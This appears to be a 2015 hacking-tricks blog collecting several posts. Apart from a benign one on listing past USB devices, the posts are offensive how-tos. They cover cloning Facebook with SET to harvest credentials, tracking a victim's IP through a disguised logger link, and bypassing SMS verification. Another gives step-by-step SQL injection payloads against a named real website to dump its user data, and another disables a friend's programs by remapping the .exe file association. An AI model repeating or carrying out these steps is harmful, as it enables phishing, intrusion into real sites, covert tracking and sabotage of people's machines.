Monday, 23 February 2015

How to Find which USB devices were Plugged in your system

2:46 pm
Hello guyz, once again we are back with another interesting trick. Just Imagine, you are running a company where you have disabled the USB Access for your employees. But since there are many clever minded peoples,they will always try to connect some or the other USB devices.

So in this case, today we have are going to show you all a way to knw wat all USB Devices are plugged into a specific System.

2 WAYS TO DO THIS ::

1. REGISTRY
2. POWERSHELL COMMAND

>_ THROUGH REGISTRY

STEP 1 : Press "WINDOWS + R" button to open Run prompt -> Type "regedit.exe" and Enter
STEP 2 : Now you are on the Registry window -> Expand HKEY_LOCAL_MACHINE -> SYSTEM -> CurrentControlSet -> Enum -> USBSTOR
STEP 3 : That's it done.. U can see the list of USB's devices connected on that system( Here we connected a Samsung mobile).


>_ THROUGH POWERSHELL COMMAND

STEP 1 : Press "WINDOWS + R" button to open Run prompt -> Type "powershell" and Enter
STEP 2 : Now type the following command : Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\* | Select FriendlyName


Any queries comment below.

Thursday, 19 February 2015

Hacking Facebook or any Email Account using IP Tab napping Method

4:18 pm
Hi guyz, Today we r going to learn how to hack any Facebook or Email accounts using IP Tabnapping method. IP Tabnapping is similar to "Phishing technique" but here instead of using a web hosting site we will use own system IP address to get he email id and password. So for this you will require :

1. BackTrack OS ( We are using Backtrack5 R2 version, download it frm www.backtrack-linux.org)
2. Some social engineering tricks + Brain (most important thing)

okay so lets begin :

Step 1 : Open Backtrack, Click on Applications > BackTrack > Exploiting Tools > Social Engineering Tools > Social Engineering Toolkit > Set

Step 2 : Now u are in the set console, you can see several options there like Social Engineering attack, Fast track penetration testing etc. Just type 1 and press Enter . This will open "Social Engineering attack". 

Step 3 : Now another window will appear Just type "2" i.e. Website Attack Vectors .

Step 4 : Now another window will appear, Just type "3" i.e. Credential Harvester Attack Method.

Step 5 : Now u will get 3 options i.e. Web templates, Site cloner, Custom Import . Just type "2" i.e. Site Cloner

Step 6 : Now it will ask to input ur Ip address, to find out IP-Address in BackTrack, Open Terminal > Type "ifconfig" . You can view ur IP-Address there. Just check out the image below for more details. After getting the IP input it in SET & press Enter.



Step 7 : Now it will ask the URL to Clone. Here you type the URL u wanna hack like Facebook, gmail , yahoo, hotmail, twitter etc. We are using www.facebook.com . 

Step 8 : Just wait for some moments till the cloning is over. When the cloning is done u r ready to hack other.  

Just use ur brain to convince people to open ur IP-Adress (mentioned above) or u can also use URL shorteners or convert the IP in Hexadecimal form so that no one gets it. 


When they will open the ip address , they will get the page shown in the image and as they input the email id and password. it will be shown in ur SET.


That's it , this process is called IP Tabnapping. Hope u guyz will remember it next time. Phishing is also the same,no much difference except in phishing we have to copy the whole source to make a new facebook login page and just change the Action value to redirect it to our own page. 

Any query regarding this comment below.

How to Bypass SMS Verification send by any email Provider

3:38 pm

In most of the websites, it asks to enter your phone number for verification. Sometimes you don't want to give it because of your privacy reasons. Even when we register in websites like Gmail, Yahoo , hotmail, rediffmail etc. they asks for SMS Verification. So today we will learn how to bypass this SMS Verification method using external number.

For this method u can use the below mentioned website :


So how it works. This websites will provide you with some numbers . For example we are using http://receive-sms-online.com/ , In the below image u can see it is providing with some numbers. we will use this number to verify our account.


Now give any of this number where it asking for number and for the verification click on the Number u gave, and refresh the page. You will get your code as shown on the image below :

For any clarification do comment below.

CREDITS :- Amar Helloween & KIIT Hackers Team


How to find Someone's IP & Location details in just 1 mins

2:56 pm
Hello guyz, Today I'm gonna show you "How to find the IP address and Geographical Location of someone in just 1 minute", Easy and quick. This method is 100% working and accurate as tested by me so no useless comments!

So lets start :

Step 1 : Go to this website : http://www.whatstheirip.com/
Step 2 : Enter your mail id and click get link. See the image for details.


Step 3 : You'll see 2 links, Just copy either one of the link and send to your victim and make him open it, say "check out my new pic" or something like that (Don't open it by yourself).


Step 4 : Check your Inbox in the mail provided in step2. You'll see a mail with an IP address, You got his IP and Geo Location !!


When your Victim or Friend opens that link he'll see an error page and he'll think it as a random error.

Hope u guyz like this trick. Do comment if u have any problem in the above steps.

Credits :- Amar Helloween, Haxor Nitrox & KIIT Hackers

How to hack websites using Manual SQL injection

2:43 pm
Hello Friends, Today we are going to learn how to hack a website using Manual SQL injection.
The website which we will be using in this demo is : www.unitedpurpose.org/

So, here is the Vulnerable link : www.unitedpurpose.org/archive/article.php?id='100

So lets begin :

Step 1: First we have to find the number of columns present in the database. So to do that we have to implement the "order by" command in the vulnerable site. Example: 

http://www.unitedpurpose.org/archive/article.php?id=100 order by 7 (any no. u have to guess it, i m using 13 )

*Remember if u get error in "order by 7" that means site has less than 7 columns,if we get the same page then the no. of columns is more than 7.. In my case the number of columns are 13.

Step 2 : After getting the columns, its time to get the vulnerable column by using "UNION SELECT" no. of all columns 1 after another separated by commas(,). See the example for more clarification :

Example : http://www.unitedpurpose.org/archive/article.php?id=-100%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--




Step 3 : In my case I got 4 and 7 as vulnerable column.(We will try with column 4). We can inject our queries in column 4 for version we can add @@version, for db database()

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version)

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4 :  Now we hav got the version as well as database name, now its time to search for the table. For that we will replace the 4 with group_concat(table_name) and add from information_schema.tables where table_schema=database(). Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--





Step 5: Now it's time for getting the columns from the User tables,we need the mysql char for this. we will replace the table_name with column_name and from information_schema.tables where table_name=mysqlchar. Just search for user and pass. Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6 : Final step to get the username and password from the column email and pass. we will remove everything from the information_schema and will add the (user,0x3a,newpass) from user's tables. Example. Just replace email and phone with ur admin and password. U will get the password in MD5 has just decrypt it.

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--











# Any problem in understanding or execution do comment below.

Changing File formats of your Friends Machine

2:22 pm
Hello Guyz, today we are going to teach you a very simple but very dangerous trick which you can try out in your friends system :P

>_What are we going to do : We will change some of the important file formats like( exe, cpl, bat, msc, mp3 , mp4 , flv or any other of ur choice) into txt format.

>_ What will happen : Whenever ur friend will open any file with the above mentioned extensions for example suppose if they open any video file of format mp4 it will open as notepad and they will never be able to play that.

So lets get started :

Step 1 : We need to access ur victims/friends machine at least for 10 minutes.

Step 2 : Type regedit.exe (registry) in run prompt of the victims machine.


Step 3 : Now you are on the Registry window -> Click on "HKEY_CLASSES_ROOT" and search for the extension you want to change. Here we are changing any executable file (.exe) to text file(.txt). Similarly you can also change of you own.

Step 4 : Click on the file format(.exe) -> On the right side their is "Default" -> Right click Modify -> It might be written as exefile change it to txtfile,similarly if u r changing any mp3 file change mp3file to txtfile. -> Click on OK and we are done.


Step 5 : Now try to open any .exe file(Here I tried opening Snipping tool), it will open in text file(Notepad). Enjoy !!!


:: HOW TO FIX THIS ISSUE ::

Since we converted .exe file to .txt file now our Regedit, command prompt any of the applications will not open. Gone case right :P

There are 2 ways to recover it back. 

(a) Create a batch file ( file with extenstion .bat) and write regedit.exe inside that file. Double click on it ur registy will open again now you can change the format.



(b) Second option you have is Opening MMC console. Type MMC on search and double click ur mmc console will open -> Now click on File -> ADD Snap-ins

Any doubts ask below in comments :

Credits :- Amar Helloween & KIIT Hackers Team

Contact us

Name

Email *

Message *

Recent

recentposts

Random

randomposts